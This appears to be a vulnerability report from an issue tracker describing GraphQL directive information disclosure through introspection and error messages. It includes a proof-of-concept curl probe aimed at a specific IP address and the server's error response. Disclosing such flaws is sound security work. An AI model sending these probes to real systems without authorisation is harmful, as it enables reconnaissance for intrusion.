GraphQL Directive Information Disclosure Vulnerability #546
Description
summary
This vulnerability allows the leakage of the instruction names, parameters and default values defined by the server through introspection queries or error messages. This will enable attackers to obtain security architectures such as authentication mechanisms, rate-limiting configurations, and sensitive field markings by crafting malicious error queries, providing precise attack references for them.
POC
curl -X POST -H "User-Agent: oxpecker" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Connection: keep-alive" -H "Content-Length: 73" -H "Content-Type: application/json" -d '{"query": "query cop { __schema { directive } }", "operationName": "cop"}' 'http://34.127.101.91:40410/graphql'
- response
{"errors":[{"message":"Cannot query field \"directive\" on type \"__Schema\". Did you mean \"directives\"?","locations":[{"line":1,"column":24}],"extensions":{"code":"GRAPHQL_VALIDATION_FAILED"}}]}